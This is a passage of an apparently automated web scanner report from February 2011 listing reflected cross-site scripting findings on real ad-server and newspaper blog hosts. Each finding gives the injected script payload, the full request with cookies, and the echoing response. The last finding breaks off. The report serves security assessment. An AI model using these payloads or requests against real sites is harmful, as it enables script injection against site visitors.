1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.107. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9f3"><script>alert(1)</script>2ae6c40c144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52d0a"%3balert(1)//c81c644a5e5 was submitted in the REST URL parameter 1. This input was echoed as 52d0a";alert(1)//c81c644a5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr52d0a"%3balert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       depends: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr52d0a";alert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatu
...[SNIP]...

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6faae"%3balert(1)//4cf314e0707 was submitted in the REST URL parameter 2. This input was echoed as 6faae";alert(1)//4cf314e0707 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php6faae"%3balert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/index.php6faae";alert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   s
...[SNIP]...

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38b"><script>alert(1)</script>874a658779c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecfa6</script><script>alert(1)</script>3132b775423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.desmoinesregister.com/dmr/xmlrpc.php
Link: <http://blogs.desmoinesregister.com/dmr/?p=110113>; rel=shortlink
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 104095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas>


<head>
<title>Daniels at CPAC calls for
...[SNIP]...
oad, civil, conservative coalition &laquo; Des Moines Register Staff Blogs",
   type:"article",
   articleinturl: "/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1",
   categorymain:"News",
   categoryname:"News",
   categoryid:"NEWS",
   pluckpage: 0,
   url: {
       hostname: "blogs.desmoinesregister.com",
       domainname: "DesMoinesRegister.com",
       domainroot: "Des
...[SNIP]...

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af9"><script>alert(1)</script>873102b4d8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
